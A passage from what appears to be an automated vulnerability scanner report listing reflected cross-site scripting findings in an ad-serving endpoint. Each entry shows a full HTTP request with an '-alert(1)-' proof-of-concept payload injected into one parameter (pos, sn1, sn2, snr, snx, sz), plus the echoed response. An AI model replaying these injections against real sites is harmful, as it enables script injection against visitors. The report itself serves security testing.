Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:18:34 GMT
Expires: Mon, 15 Nov 2010 07:23:34 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6118

document.write('<!-- Template Id = 2,594 Template Name = Banner Creative (Flash) - In Page Multiples -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.ne
...[SNIP]...
448%3B3454-728/90%3B36222475/36240353/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt146048_244044%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory92149'-alert(1)-'093ff1d54f7&pos=TopAd&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt1&ad=728x90_Remnant_ROS_B4763885.2&sn2=6eff218/e43bef4&snr=doubleclick&snx=1289802071&sn1=f9dd9d37/efa65b8&goto=http://personalsavings.americanexp
...[SNIP]...

4.56. http://ad.vulnerable.ad.partner/adj/N553.newyorktimes.com/B4763885.2 [pos parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N553.newyorktimes.com/B4763885.2

Issue detail

The value of the pos request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 41333'-alert(1)-'81ced2474ac was submitted in the pos parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N553.newyorktimes.com/B4763885.2;sz=728x90;pc=nyt146048_244044;ord=2010.11.15.07.15.11;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=TopAd41333'-alert(1)-'81ced2474ac&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt1&ad=728x90_Remnant_ROS_B4763885.2&sn2=6eff218/e43bef4&snr=doubleclick&snx=1289802071&sn1=f9dd9d37/efa65b8&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:18:57 GMT
Expires: Mon, 15 Nov 2010 07:23:57 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6112

document.write('<!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page Multiples - [DFA] -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s
...[SNIP]...
-728/90%3B38213471/38231228/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt146048_244044%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=TopAd41333'-alert(1)-'81ced2474ac&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt1&ad=728x90_Remnant_ROS_B4763885.2&sn2=6eff218/e43bef4&snr=doubleclick&snx=1289802071&sn1=f9dd9d37/efa65b8&goto=http://personalsavings.americanexpress.com/s
...[SNIP]...

4.57. http://ad.vulnerable.ad.partner/adj/N553.newyorktimes.com/B4763885.2 [pos parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N553.newyorktimes.com/B4763885.2

Issue detail

The value of the pos request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e466c"-alert(1)-"f5bbc38d216 was submitted in the pos parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N553.newyorktimes.com/B4763885.2;sz=728x90;pc=nyt146048_244044;ord=2010.11.15.07.15.11;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=TopAde466c"-alert(1)-"f5bbc38d216&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt1&ad=728x90_Remnant_ROS_B4763885.2&sn2=6eff218/e43bef4&snr=doubleclick&snx=1289802071&sn1=f9dd9d37/efa65b8&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:18:53 GMT
Expires: Mon, 15 Nov 2010 07:23:53 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6107

document.write('<!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page Multiples - [DFA] -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s
...[SNIP]...
-728/90%3B38208490/38226247/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt146048_244044%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=TopAde466c"-alert(1)-"f5bbc38d216&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt1&ad=728x90_Remnant_ROS_B4763885.2&sn2=6eff218/e43bef4&snr=doubleclick&snx=1289802071&sn1=f9dd9d37/efa65b8&goto=http://personalsavings.americanexpress.com/s
...[SNIP]...

4.58. http://ad.vulnerable.ad.partner/adj/N553.newyorktimes.com/B4763885.2 [sn1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N553.newyorktimes.com/B4763885.2

Issue detail

The value of the sn1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d9c3e'-alert(1)-'cdc68db4077 was submitted in the sn1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N553.newyorktimes.com/B4763885.2;sz=728x90;pc=nyt146048_244044;ord=2010.11.15.07.15.11;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=TopAd&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt1&ad=728x90_Remnant_ROS_B4763885.2&sn2=6eff218/e43bef4&snr=doubleclick&snx=1289802071&sn1=f9dd9d37/efa65b8d9c3e'-alert(1)-'cdc68db4077&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:20:05 GMT
Expires: Mon, 15 Nov 2010 07:25:05 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6112

document.write('<!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page Multiples - [DFA] -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s
...[SNIP]...
e=listings.nytimes.com/BusinessDirectory&pos=TopAd&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt1&ad=728x90_Remnant_ROS_B4763885.2&sn2=6eff218/e43bef4&snr=doubleclick&snx=1289802071&sn1=f9dd9d37/efa65b8d9c3e'-alert(1)-'cdc68db4077&goto=http://personalsavings.americanexpress.com/savings-product.html\">
...[SNIP]...

4.59. http://ad.vulnerable.ad.partner/adj/N553.newyorktimes.com/B4763885.2 [sn1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N553.newyorktimes.com/B4763885.2

Issue detail

The value of the sn1 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 300ba"-alert(1)-"8f69fbdd3e9 was submitted in the sn1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N553.newyorktimes.com/B4763885.2;sz=728x90;pc=nyt146048_244044;ord=2010.11.15.07.15.11;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=TopAd&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt1&ad=728x90_Remnant_ROS_B4763885.2&sn2=6eff218/e43bef4&snr=doubleclick&snx=1289802071&sn1=f9dd9d37/efa65b8300ba"-alert(1)-"8f69fbdd3e9&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:20:01 GMT
Expires: Mon, 15 Nov 2010 07:25:01 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6118

document.write('<!-- Template Id = 2,594 Template Name = Banner Creative (Flash) - In Page Multiples -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.ne
...[SNIP]...
e=listings.nytimes.com/BusinessDirectory&pos=TopAd&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt1&ad=728x90_Remnant_ROS_B4763885.2&sn2=6eff218/e43bef4&snr=doubleclick&snx=1289802071&sn1=f9dd9d37/efa65b8300ba"-alert(1)-"8f69fbdd3e9&goto=http://personalsavings.americanexpress.com/savings-product.html");
var wmode = "opaque";
var bg = "same as SWF";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 600;
var
...[SNIP]...

4.60. http://ad.vulnerable.ad.partner/adj/N553.newyorktimes.com/B4763885.2 [sn2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N553.newyorktimes.com/B4763885.2

Issue detail

The value of the sn2 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4a5ea"-alert(1)-"c7fe987232 was submitted in the sn2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N553.newyorktimes.com/B4763885.2;sz=728x90;pc=nyt146048_244044;ord=2010.11.15.07.15.11;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=TopAd&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt1&ad=728x90_Remnant_ROS_B4763885.2&sn2=6eff218/e43bef44a5ea"-alert(1)-"c7fe987232&snr=doubleclick&snx=1289802071&sn1=f9dd9d37/efa65b8&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:19:34 GMT
Expires: Mon, 15 Nov 2010 07:24:34 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6114

document.write('<!-- Template Id = 2,594 Template Name = Banner Creative (Flash) - In Page Multiples -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.ne
...[SNIP]...
ytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=TopAd&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt1&ad=728x90_Remnant_ROS_B4763885.2&sn2=6eff218/e43bef44a5ea"-alert(1)-"c7fe987232&snr=doubleclick&snx=1289802071&sn1=f9dd9d37/efa65b8&goto=http://personalsavings.americanexpress.com/savings-product.html");
var wmode = "opaque";
var bg = "same as SWF";
var dcallowscriptaccess = "nev
...[SNIP]...

4.61. http://ad.vulnerable.ad.partner/adj/N553.newyorktimes.com/B4763885.2 [sn2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N553.newyorktimes.com/B4763885.2

Issue detail

The value of the sn2 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3c216'-alert(1)-'68576e4d92 was submitted in the sn2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N553.newyorktimes.com/B4763885.2;sz=728x90;pc=nyt146048_244044;ord=2010.11.15.07.15.11;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=TopAd&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt1&ad=728x90_Remnant_ROS_B4763885.2&sn2=6eff218/e43bef43c216'-alert(1)-'68576e4d92&snr=doubleclick&snx=1289802071&sn1=f9dd9d37/efa65b8&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:19:38 GMT
Expires: Mon, 15 Nov 2010 07:24:38 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6106

document.write('<!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page Multiples - [DFA] -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s
...[SNIP]...
ytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=TopAd&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt1&ad=728x90_Remnant_ROS_B4763885.2&sn2=6eff218/e43bef43c216'-alert(1)-'68576e4d92&snr=doubleclick&snx=1289802071&sn1=f9dd9d37/efa65b8&goto=http://personalsavings.americanexpress.com/savings-product.html\">
...[SNIP]...

4.62. http://ad.vulnerable.ad.partner/adj/N553.newyorktimes.com/B4763885.2 [snr parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N553.newyorktimes.com/B4763885.2

Issue detail

The value of the snr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c25dd'-alert(1)-'da387dc9d56 was submitted in the snr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N553.newyorktimes.com/B4763885.2;sz=728x90;pc=nyt146048_244044;ord=2010.11.15.07.15.11;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=TopAd&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt1&ad=728x90_Remnant_ROS_B4763885.2&sn2=6eff218/e43bef4&snr=doubleclickc25dd'-alert(1)-'da387dc9d56&snx=1289802071&sn1=f9dd9d37/efa65b8&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:19:47 GMT
Expires: Mon, 15 Nov 2010 07:24:47 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6118

document.write('<!-- Template Id = 2,594 Template Name = Banner Creative (Flash) - In Page Multiples -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.ne
...[SNIP]...
in/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=TopAd&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt1&ad=728x90_Remnant_ROS_B4763885.2&sn2=6eff218/e43bef4&snr=doubleclickc25dd'-alert(1)-'da387dc9d56&snx=1289802071&sn1=f9dd9d37/efa65b8&goto=http://personalsavings.americanexpress.com/savings-product.html\">
...[SNIP]...

4.63. http://ad.vulnerable.ad.partner/adj/N553.newyorktimes.com/B4763885.2 [snr parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N553.newyorktimes.com/B4763885.2

Issue detail

The value of the snr request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ce708"-alert(1)-"1dc8e459cae was submitted in the snr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N553.newyorktimes.com/B4763885.2;sz=728x90;pc=nyt146048_244044;ord=2010.11.15.07.15.11;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=TopAd&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt1&ad=728x90_Remnant_ROS_B4763885.2&sn2=6eff218/e43bef4&snr=doubleclickce708"-alert(1)-"1dc8e459cae&snx=1289802071&sn1=f9dd9d37/efa65b8&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:19:43 GMT
Expires: Mon, 15 Nov 2010 07:24:43 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6107

document.write('<!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page Multiples - [DFA] -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s
...[SNIP]...
in/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=TopAd&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt1&ad=728x90_Remnant_ROS_B4763885.2&sn2=6eff218/e43bef4&snr=doubleclickce708"-alert(1)-"1dc8e459cae&snx=1289802071&sn1=f9dd9d37/efa65b8&goto=http://personalsavings.americanexpress.com/savings-product.html");
var wmode = "opaque";
var bg = "same as SWF";
var dcallowscriptaccess = "never";

var openWi
...[SNIP]...

4.64. http://ad.vulnerable.ad.partner/adj/N553.newyorktimes.com/B4763885.2 [snx parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N553.newyorktimes.com/B4763885.2

Issue detail

The value of the snx request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c41c8"-alert(1)-"ac3f17478db was submitted in the snx parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N553.newyorktimes.com/B4763885.2;sz=728x90;pc=nyt146048_244044;ord=2010.11.15.07.15.11;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=TopAd&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt1&ad=728x90_Remnant_ROS_B4763885.2&sn2=6eff218/e43bef4&snr=doubleclick&snx=1289802071c41c8"-alert(1)-"ac3f17478db&sn1=f9dd9d37/efa65b8&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:19:52 GMT
Expires: Mon, 15 Nov 2010 07:24:52 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6118

document.write('<!-- Template Id = 2,594 Template Name = Banner Creative (Flash) - In Page Multiples -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.ne
...[SNIP]...
ml?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=TopAd&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt1&ad=728x90_Remnant_ROS_B4763885.2&sn2=6eff218/e43bef4&snr=doubleclick&snx=1289802071c41c8"-alert(1)-"ac3f17478db&sn1=f9dd9d37/efa65b8&goto=http://personalsavings.americanexpress.com/savings-product.html");
var wmode = "opaque";
var bg = "same as SWF";
var dcallowscriptaccess = "never";

var openWindow = "false";
...[SNIP]...

4.65. http://ad.vulnerable.ad.partner/adj/N553.newyorktimes.com/B4763885.2 [snx parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N553.newyorktimes.com/B4763885.2

Issue detail

The value of the snx request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 18f06'-alert(1)-'d4d6ba4e70a was submitted in the snx parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N553.newyorktimes.com/B4763885.2;sz=728x90;pc=nyt146048_244044;ord=2010.11.15.07.15.11;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=TopAd&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt1&ad=728x90_Remnant_ROS_B4763885.2&sn2=6eff218/e43bef4&snr=doubleclick&snx=128980207118f06'-alert(1)-'d4d6ba4e70a&sn1=f9dd9d37/efa65b8&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:19:56 GMT
Expires: Mon, 15 Nov 2010 07:24:56 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6110

document.write('<!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page Multiples - [DFA] -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s
...[SNIP]...
ml?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=TopAd&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt1&ad=728x90_Remnant_ROS_B4763885.2&sn2=6eff218/e43bef4&snr=doubleclick&snx=128980207118f06'-alert(1)-'d4d6ba4e70a&sn1=f9dd9d37/efa65b8&goto=http://personalsavings.americanexpress.com/savings-product.html\">
...[SNIP]...

4.66. http://ad.vulnerable.ad.partner/adj/N553.newyorktimes.com/B4763885.2 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N553.newyorktimes.com/B4763885.2

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ea110'-alert(1)-'4a1a8ea4008 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N553.newyorktimes.com/B4763885.2;sz=728x90;pc=nyt146048_244044;ord=2010.11.15.07.15.11;click=http://www.nytimes.com/adx/bin/adx_click.html?type=gotoea110'-alert(1)-'4a1a8ea4008&opzn&page=listings.nytimes.com/BusinessDirectory&pos=TopAd&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt1&ad=728x90_Remnant_ROS_B4763885.2&sn2=6eff218/e43bef4&snr=doubleclick&snx=1289802071&sn1=f9dd9d37/efa65b8&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
